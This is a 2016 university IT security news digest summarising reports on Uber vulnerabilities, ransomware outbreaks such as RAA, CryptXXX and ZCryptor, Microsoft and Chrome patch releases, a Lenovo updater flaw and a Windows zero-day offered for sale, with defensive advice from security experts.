Site Accessibility Statement
Wilfrid Laurier University Information and Communication Technologies
June 25, 2016
 
 
Canadian Excellence

Information Security News (June-22-2016)



 -- Pen testers discover mega vulnerabilities in Uber (June-23-2016)

Pen testing outfit Integrity has published a list of eight bugs uncovered during a three-week hunt for security vulnerabilities in the Uber car-hire system.

The team began hunting for vulnerabilities shortly after Uber opened its public bug bounty programme in March.

Despite other pen testers, who participated in an invite-only programme, having gone over the system before them, the team persevered and found flaws as they dug deeper and deeper into the system.

The flaws uncovered by the Portugal-based team allowed them to identify individual drivers and passengers download their travel history. They also discovered a voucher that even Uber didn't know existed for a $100 emergency ride.

They discovered six vulnerabilities which had previously been reported to Uber: open redirect in trip.uber.com, open redirect in riders.uber.com, enumerate users via getrush.uber.com and then brute force via iOS app to get a valid account, ability to download the beta app as admin, use the partner/driver app without being activated and enumerating user IDs with phone numbers.

Eight new vulnerabilities were reported by the team (four are under embargo, not to be disclosed until later): brute force attack to get invite codes via riders.uber.com, view driver waybill via drivers UUID, get drivers private email from UUID and getting information on trips from arbitrary users.

Fabio Pires, writing for the team, said that Uber has a very good bug bounty programme – “with great payouts” – and its development team seem genuinely eager to patch any vulnerabilities as soon as possible.

--Ransomware attack on Red Deer College thwarted (June-22-2016)

Red Deer College says it managed to ward off a ransomware attack last Friday after an employee downloaded an infected file but quickly noticed something was amiss and alerted the school's IT help desk.

"We were able to lock down the system within about five minutes," said Jim Brinkhurst, vice-president of college services.

"As a result of the quick response, we did not lose any data."

Post-secondary institutions, in particular, need to be prepared for these types of attacks, according to Chester Wisniewski, a senior security adviser with Sophos, a computer security firm based in Vancouver.

"I would actually be surprised if any significantly sized organizations — especially something like a university, which is rather difficult to put controls on compared to a company — hasn't experienced some ransomware attacks, although obviously not usually as high of profile or as visibly as the ones at the University of Calgary," he said.

The U of C revealed earlier this month it had paid $20,000 to hackers who infected university computers with ransomware, which encrypts valuable data and renders it useless to the owners unless they pay a fee to the attackers to decrypt it.

Wisniewski said most attacks come in the form of a fake email that tricks recipients into downloading an infected attachment. Lately, he said attackers have targeted Canadians with official-looking emails purporting to come from the Canada Revenue Agency.

He said other attacks rely on exploiting vulnerabilities in software, particular Adobe Flash, to infect computers that visit websites controlled by hackers.

In Red Deer College's case, Brinkhurst said the employee had downloaded a file, not through email, that was infected when she noticed her error and called for support.

The college has been stepping up its defences against cyber attacks in the past six to eight months, he added, with extra training for faculty and staff on how to avoid becoming victims.

Make sure to back up your information

Wisniewski recommends regularly updating your computer's software, running a current anti-virus program, and being skeptical of unsolicited messages asking you download files or visit unfamiliar websites.

Regularly backing up your data is "critically important," he added, and can save you a major headache — in addition to money — in the event that you do fall victim to a ransomware attack.

"At the University of Calgary, it could have saved them $20,000," he said.

"If you've got extra copies of all your sensitive information, you can tell the bad guys to take a hike and just go and get your backup hard drive."

--New RAA ransomware written in JavaScript discovered (June-17-2016)

A new variety of ransomware called RAA has been discovered that has the somewhat unusual attribution of being coded in JavaScript instead of one of the more standard programming languages making it more effective in certain situations.

Bleeping Computer reported that security researchers @JAMES_MHT and @benkow_ found RAA and said it is being distributed by email through attachments that pretend to be a regular document file. Since JavaScript does not by itself feature any default cryptography functions the ransomware creators use the CryptoJS library which enabled AES encryption to be used to lock up the victims' files.

Using JavaScript as a ransomware delivery vehicle is not exactly new, but it is not a method seen every day, said Malwarebytes Senior Researcher Jerome Segura.

Kevin Epstein, vice president of threat operations center at Proofpoint, told SCMagazine.com in an email, “As we've previously discussed in our blog, JavaScript can provide an advantage for attackers in various ways over compiled .exe files -- but we've seen ransomware written in everything from C++ to straight .bat files; detection needs to be based on dynamic as well as static file examination methods."

Opening the attachment kicks off a series of steps that not only locks up the victim's files, but also downloads some additional malware onto the target computer. The attachment does not visibly do anything, but appears to the victim as a corrupted file. However, in fact it is busy doing its dirty work in the background. This includes deleting the Windows Volume Shadow Copy so the encrypted files cannot be recovered and the ransomware is set to run every time Windows starts up so it can capture any new information.

“JavaScript is heavily used on the web and so it's a little bit unusual to see an actual piece of ransomware powered by a scripting language. Having said that, we witness many different infection vectors that were once considered old school (like macros) or unsophisticated making a comeback, he told SCMagazine.com.

Bleeping Computer said at this time there is no way to decrypt the files, although there are steps to be taken that can thwart the attack.

“I guess it shows that there is a multitude of ways to load ransomware and defenders need to stay vigilant. In this particular case, disabling email attachments that contain a JavaScript file would be a good way of thwarting those attacks since there really is no legitimate purpose in sending those files by email in a normal context,” Segura said.

The additional malware installed is the password stealing Pony trojan.

--Microsoft's June Patch Tuesday features 16 bulletins, five rated critical (June-14-2016)

Microsoft's June Patch Tuesday offering served up 16 update bulletins with five rated critical covering 44 CVEs, which equaled the number posted in May, but with three fewer critical issues.

Topping the list are the critical rated MS16-063, MS16-068, MS16-069, MS16-070 and MS16-071, all of which if left unpatched would allow remote code execution. The impacted applications are: Windows, Internet Explorer, Edge and Office and Office services and web apps. The remaining 11 bulletins all had an “important” rating.

MS16-071 caused alarm bells to go off for many industry experts.

Bobby Kuzma, systems engineer at Core Security, told SCMagazine.com in an email that he is most concerned about the DNS MS16071 as having the greatest potential for exploitation in the wild.

“DNS MS16071 allows an unauthenticated attacker to send a specially crafted DNS request and would allow them to run the code as the local system account. [An] Interesting corollary to the DNS client vulnerabilities that we saw a few months ago,” he said.

Michael Gray, VP of Technology at Thrive Networks, agreed pointing out that this type of update is outside the norm/

“These types of patches are not typical, but given that most Windows DNS servers are not internet facing the exposure to the vulnerability is greatly decreased,” he told SCMagazine.com in an email.

Qualys CTO Wolfgang Kandek singled out MS16-070 as the one to watch, from the client side, in his monthly Patch Tuesday blog.

“The most important vulnerability is addressed in MS16-070, which fixes a number of problems in Microsoft Office. The most important vulnerability here is CVE-2016-0025 in Microsoft Word RTF format, which yields RCE for the attacker. Since RTF can be used to attack through Outlook's preview pane, the flaw is can be triggered with a simple e-mail without user interaction,” Kandek noted.

Of the remaining updates the MS16-075 and MS16-076, which resolve vulnerabilities in Windows and Netlogon, stood out for Ty Reguly, manager at Tripwire VERT.

“One of the more interesting notes for administrators this month is that MS16-075 and MS16-076 share a security update for the server platforms. This means one less patch to install in those environments. It also addresses a couple of interesting vulnerabilities, particularly with MS16-075. The ability to forward authentication from one service to another is a particularly nasty flaw, however, Microsoft has indicated that the attacker must have authenticated access to the system, mitigating some of the risk,” Reguly told SCMagazine in an email.

Chris Goettl, product manager with Shavlik, also pointed out that MS16-075 (CVE-2016-3225), along with MS16-077 (CVE-2016-3236) and MS16-082 (CVE-2016-3230), that while rated important are all rated as important, but due to the public disclosures, these should warrant more immediate attention, Goettl told SCMagazine.com in an email.

--Microsoft updates malware warnings with more specifics --(June-06-2016)

Microsoft has launched a new malware warning system with its Bing search engine now giving users specific warnings about possible threats on the sites being visited.

Chad Foster, Bing program manager, wrote in a blog, that Microsoft was doing away with its generic warnings that only told users that a site might contain malware. He said the change was needed because the word malware is simply to generic.

“Bing now gives more details about the type of threat the user is facing. Furthermore, this improvement enables webmasters to clean their site quicker by having stronger insights into why their site was flagged,” he wrote.

Warnings will now say “this might be a phishing site” or “this site might lead to malicious software” will now appear for users while webmasters will receive a more detailed version so they can dig out any malware.

--'Trojan.Pornclicker' spotted in the Google Play store --(June-06-2016)

Malwarebytes researchers spotted what they dubbed a “Trojan.Pornclicker” in the Google Play store disguised as a Turkish application named “Mayis Guzel Aydir.”

The app's name roughly translates, depending on the source, either to “May Beautiful Overnights” or “May is a beautiful month” and once installed and opened, it displays a full-screen eyeball that doesn't appear to do anything. However, behind the scenes the application is manually visiting adult sites for the purpose of gaining revenue on a pay-per-click basis, according to a June 2 blog post. 

Even if a user removes the app after seeing the app appears useless, researchers said the damage has already been done.

“Every time the app clicks any of these websites, the bad guys get paid and you are left with some embarrassing network traffic,” researchers said in the post.

Researchers said the app didn't have a description in the Google Play store and displayed a few screenshots of a calculator app which didn't appear to have anything to do with the app's name.

Despite lacking a clear description, the application had between 1,000 – 5,000 installs and 3.2 star rating with 383 ratings given on Google Play at the time the post was written, researchers said in the post. Several other versions of the app were also spotted with the same name but with a number at the end, such as “Mayis Guzel Aydir 2.”

The malicious app is also designed to monetize the bandwidth of its victim's traffic in a direct manner through ad clicks as opposed to stealing data, Tripwire Security Researcher Craig Young told SCMagazine.com via email comments. 

“Fortunately for consumers, in this case the damage is primarily caused to advertisers and advertising networks, but this type of attack can also end up costing users money by way of excessive data charges,” he said.

“Beyond the use of mobile anti-virus software, an average user would likely never know that their device is being abused in this way apart from battery drain and extra data consumption.”

The app has since been taken down but researches warned there may be others out there and experts said this is a common attack where someone creates an attack that appears useful but conducts malicious deeds in the background.

“In the traditional desktop world, the Trojan threat such as this is more difficult to contain and fix,” Engin Kirda, co-founder and chief architect at Lastline, told SCMagaine.com via emailed comments.

“In the mobile world, however, we have the advantage that once a threat like this is detected, the app would be thrown out of the play store and more infections would be prevented,” Kirda said.

He said the easiest protection is not to install any apps that have very low popularity ratings or a low number of downloads and that highly popular apps will usually not be malicious although there are expectations. He also said users should make sure they only give permission for the app to use things you think the app will need.  

--Google updates Chrome wtih 15 patches --(June-06-2016)

Google reported it has updated Chrome to version 51.0.2704.79 for Windows, Mac, and Linux with a total of 15 security fixes, including two high and five medium threats, being patched.

The online giant paid out $26,000 in bug bounty fees to five individuals.

The two high priority issues were CVE-2016-1696 and CVE-2016-1697, each of which earned its discovers $7,500 each. The former was a cross-origins bypass in Extension bindings and the latter was also a cross-origin bypass but in Blink. Google credited Mariusz Mlynski for finding the second issue. The other bug hunter was anonymous.

Rob Wu found three issues for Google: CVE-2016-1698, $4,000, a Information leak in Extension bindings; CVE-2016-1700, $1,500, a Use-after-free in Extensions; and CVE-2016-1701, $1,000, Use-after-free in Autofill.

--Report: 93 percent of phishing emails contained ransomware --(June-06-2016)

As cybercriminals pursue methods that yield the most effective near-term gains, phishing emails and ransomware prove an irresistible cocktail for cybercriminals, as a new report demonstrates. A report conducted by PhishMe found that 93 percent of phishing emails studies in March contained ransomware.

The study found 6.3 million phishing emails in Q1 2016, a volume of phishing emails that increased by 789 percent from the previous three month period.

Another study found that 46 percent of information technology decision makers said their company was “significantly” affected by malware, including phishing, ransomware, DDoS, APT, or other attacks. “The security problem is getting consistently worse, the consequences are getting consistently larger, and the frequency is growing,” PC Pitstop CEO Rob Cheng said in a statement.

ZapFraud CTO/founder Markus Jakobsson told SCMagazine.com that the number of phishing emails has certainly increased, but said the number of successful attacks is largely the result of sophisticated spearphishing attacks. He said targeted attacks “can net millions, instead of thousands,” and he noted that they “can be far more devastating.”

“One of the biggest concerns is the continued automation of targeted attacks,” Jakobsson said. Criminal groups are scraping the web to determine which companies do business with each other, and use that information to generate targeted phishing emails “all without an actual person doing the work.”

--CryptXXX ransomware again updated, can now encrypt network shared files (June-02-2016)

An updated version of the CryptXXX ransomware – that again renders decryption tools ineffective and has the ability for network share encryption – has been spotted in the wild.

Proofpoint researchers said in a blog post that CryptXXX v3.1000 was found in the wild last week. The nasty network share capability allows an infected machine to scan the /24 subnet on a local area network, find shared storage resources and then encrypt those files.

It was also noted that the CryptXXX decryptor tool developed by Kaspersky Labs had been rendered ineffective by CryptXXX v 2.0 in May. It now remains basically unusable as “decrypting individual files is time-consuming and scales poorly, especially as CryptXXX begins encrypting many more files across network shares,” the Proofpoint researchers wrote.

The attackers also rolled out a new payment portal.

--Lenovo advises users to remove vulnerable preinstalled app (June-02-2016)

Lenovo advised users to remove the preloaded “Lenovo Accelerator Application” tool after researchers from the firm Duo Security discovered it could be exploited to perform man-in-the-middle (MitM) style attacks.

The vulnerable application has an insecure update mechanism that can be remotely executed by an attacker with local network access and was installed on some consumer notebook and desktop systems that were preloaded with the Windows 10 operating system, according to a Lenovo's security advisory. 

Customers should uninstall Lenovo Accelerator Application by going to the “Apps and Features” application in Windows 10, selecting Lenovo Accelerator Application and clicking on “Uninstall', Lenovo said in the advisory.

If an attacker were to exploit the vulnerability the application would think that an update is available, download that update, and start installing it with system privileges, Flexera Software Director of Research and Security Kasper Lingaard told SCMagazine.com via emailed comments.

Once this is done the attacker can install whatever he or she wants, he said adding, the vulnerability is due to the lack of encrypted traffic and the lack of security checks on the authenticity of the update.

"Traffic should be encrypted and updates should be signed," he said. “And you could always argue if updates really should be fetched and installed automatically when no proper security checks are implemented."

Lingaard said the vulnerability is easy to exploit and couldn't think of a reason why researchers had missed it in the preinstalled application.

“It would be very hard to argue it as being a simple oversight, so ignorance would likely be the best word to describe it,” he said referring to the vulnerability.

This isn't the first time Lenovo has been in hot water for its products containing preinstalled issues.

Last year, Lenovo was called out for shipping laptops infected with the “Superfish” adware preinstalled which led to Facebook probing the larger issue of SSL-sniffing adware.

--CryptoLocker partially shuts down Pinal County, Ariz. government network (June-02-2016)

The computer network of the Pinal County Attorney's Office in Arizona has been hit with CryptoLocker, effectively shutting down a segment of that agency's system, according to 12news.

County Attorney Lando Voyles said the ransomware has so far destroyed 64,000 files, isolated in his office's case management system – through which the public can request public records. He said it would likely be a week before the system is restored.

CryptoLocker is a trojan that depends on social engineering to dupe email recipients into opening attachments that appear to come from a legitimate sender. However, once the victim clicks on the file a virus is implanted on the computer or network which encrypts popular file types and a ransom is demanded, usually either via bitcoin or a pre-paid cash card.

Voyles said he had no intention of paying the ransom.

Contending that he had no evidence to press charges, Voyles said he has yet to get law enforcement involved. 

--Russia clamps down on financial hackers (June-01-2016)

Fifty members of a hacker gang alleged to have created malware used to steal millions from Russian banks have been arrested by Russian police.

Over the past year, malware used by the gang enrolled computers in a botnet that was then able to target 18 unidentified banks and government agencies. The amount stolen ranges from $25.5 million to $45 million (USD) in differing accounts.

The Federal Security Service (FSB) – in cooperation with the Interior Ministry and National Guard troops – made the arrests in 15 regions across the Russian Federation, according to a Bloomberg News report.

Of those arrested, 18 suspects were denied bail and three were placed under house arrest. All were charged with the creation, distribution and use of malicious computer programs.

During the raids, police took possession of computer and communications equipment, bank cards in false names, financial documents and "significant amounts of cash," the FSB said.

--Jetpack plug-in for WordPress vulnerable to XSS (June-01-2016)

Bloggers using the WordPress platform are being advised to update the Jetpack plug-in to avoid a cross-site scripting vulnerability.

One million users of the plug-in – which was developed by Automattic, the makers of WordPress – could be at risk. The tool provides website enhancements, management and security features.

The flaw – which impacts Jetpack releases since 2012, beginning with v2.0 – was detected by web security firm Sucuri. The bug is located in the Shortcode Embeds Jetpack module, a shortcut function enabled by default that allows users to embed videos, images, documents, tweets and other materials.

The Sucuri researchers said this flaw can be exploited to inject malicious JavaScript code into comments. Subsequently, it "could allow an attacker to hijack administrator accounts, inject SEO spam to the affected page, and redirect visitors to malicious websites," Sucuri noted in a blog post.

Update as soon as possible, said the researchers.

--Microsoft ends common password use and password lockout (May-31-2016)

Microsoft is dynamically banning common passwords and using smart password lockout to protect users and passwords in the Microsoft Account System and private preview Azure AD.

Dynamically banning common passwords helps users choose a unique and hard to guess password. The Azure AD Identity Protection team keeps updating the list of common password continuously to prevent users from choosing known easy passwords - such as Password.

Smart password lockout is another method Microsoft is using to make sure users are not locked out if bad guys are trying to guess passwords online. This approach considers the risk associated with a specific login session to apply lockout semantic.  Microsoft says it can can determine the risk associated with a specific login session using data on where the person is logging in and what network they are using, and so can lock out suspected intruders, but allow legitmate users to login if they are using  their own device on an internet network they have used before.

This move by Microsoft has been seen by some as a response to recent data breaches such as that at LinkedIn where credentials from a 2012 breach saw 272.3 million stolen accounts traded on a Russian darknet. Troy Hunt, creator of the cyber-breach service Have I Been Pwned? commented in a blog post by threatpost, “The danger for LinkedIn users is that while most of the four-year-old LinkedIn data is garbage, there are tens of millions of email addresses out of the 117 million tied to passwords that will still unlock accounts elsewhere on the web today.”

This concern is reinforced by the recent discovery of a password reuse bot with the ability to test leaked credentials on the dark web targeting multiple websites. The credential testing runs on poorly protected sites and then successful hits are taken to highly secured sites in the hope that the same passwords can be used over and over.

Brian Spector, CEO of Miracl, wrote to SCMagazineUK.com, “Although it is great that Microsoft is trying to increase security and awareness in this way .... complex passwords are inconvenient, which is why people are failing to adopt them.”

“Consumers tell us that they are struggling to remember what is now an average of over 100 passwords in Europe. At a time when the number of devices we own is rising sharply, this frustration has relegated the registration process to being the most broken thing about the internet,” Richard Lack, director of sales - EMEA, Gigya, commented in an email to SC.

Whilst Jonathan Sander, VP of product strategy at Lieberman Software, considers Microsoft's move excellent and hopes the fruits of this effort become open to all, he has an interesting comment on the timing of the announcement. “I imagine that Microsoft is only instituting its banned password list now because there is enough political capital to do it with so many breaches and stolen passwords in the news,” he said.

On the other hand, some researchers question the password infrastructure. “Microsoft's move doesn't fix the underlying problem that passwords just aren't secure enough to protect the personal information that we all store and access online today,” Spector said.

Dave Worrall, CTO of Secure Cloudlink in a comment sent to SC argues, “It's therefore time to completely rethink the entire password-driven security system. Passwords have quickly transitioned into an indefensible means of user authentication because of their basic security vulnerabilities”. He added: “Now is the time to look at solutions that eliminate the need for the password in the first place.”

“Within the next 10 years, traditional passwords will be dead as an authentication form. Consumer-focused brands require modern customer identity management infrastructures that support newer, more secure authentication methods, such as biometrics,” Patrick Salyer, CEO at Gigya, wrote to SC.

--Hackers offering Microsoft Windows zero-day exploit for $90,000 (May-31-2016)

A cybercriminal is offering up what may well be a valid zero-day exploit for $90,000 that supposedly is effective against almost every version of Microsoft Windows now in use.

Trustwave researchers said the criminal group's claim that the exploit works on all iterations of the Windows operating system from Windows 2000 to 10 is most likely valid and the security firm expects someone to pay the asking price. The item was first spotted on May 11 on a Russian cybercrime website with an initial price of $95,000, but this was lowered to $90,000 on May 23.

“Based on this and the prices we know about, the price here seems on the high end but still within a realistic price range, especially considering the return on investment criminals are likely to make using this exploit in any campaign,” Trustwave wrote.

The exploit is a local privilege escalation (LPE) zero day for systems running the 32-bit versions of the operating system. The LPE is particularly dangerous because when matched with other malware in can be used in almost any kind of attack.

“While the most coveted zero day would be a Remote Code Execution (RCE) exploit, Local Privilege Escalation vulnerabilities are likely next in line in popularity. Although such an exploit can't provide the initial infection vector like a Remote Code Execution would, it is still a very much needed puzzle piece in the overall infection process,” Trustwave wrote.

Since this is a case of criminals selling to criminals, the seller tries to build some level of trust into the deal by including two videos that supposedly show the exploit functioning properly. The first shows a Windows 10 system being exploited and the second shows the exploit bypassing all of Microsoft's Enhanced Mitigation Experience Toolkit (EMET) protections included in Windows 10.

Those behind the exploit say it will be sold only to a single buyer who for $90,000 will receive the source code for the exploit and the demo, free updates that will address any security improvements added to Windows, a detailed write up of the vulnerability details and complementary consultation on integrating the exploit.

-- Microsoft warns of new, self-propagating ransomware in the wild (May-27-2016)

A new version of ransomware, dubbed Ransom:Win32/ZCryptor.A, that is able to move itself from computer to computer is hitting Microsoft Windows users.

Microsoft's Threat Research & Response blog issued an alert to its customers on May 26 warning them of the bug, which also goes by the name ZCryptor. The nastiest aspect of this piece of malware is its ability to reproduce and then spread to other systems through removable media devices, such as flash drives, as well as network drives. This capability is not often seen, noted Trend Micro researcher Michael Jay Villanueva.

“This ransomware is one of the few ransomware families that is capable of spreading on its own. It drops a copy of itself in removable drives, making use of USBs a risky practice,” he said in a research note on the ransomware.

Trend Micro gave ZCryptor an overall risk rating of critical with a high damage potential.

The ransomware has several methods of being injected into a computer. Microsoft noted it can be distributed via spam emails, macro malware or through fake Flash Player installers. When it tries to spread through removable storage devices it “drops autorun.inf in removable drives, a zycrypt.lnk in the start-up folder: %User Startup%zcrypt.lnk along with a copy of itself as {Drive}:system.exe and %appdata%zcrypt.exe, and changes the file attributes to hide itself from the user in file explorer,” the Microsoft report said.

Once embedded and the files are encrypted a ransom note appears demanding 1.2 bitcoins, around $500, for the decryption key. It gives the victim four days to comply and then boosts the payment to five Bitcoins.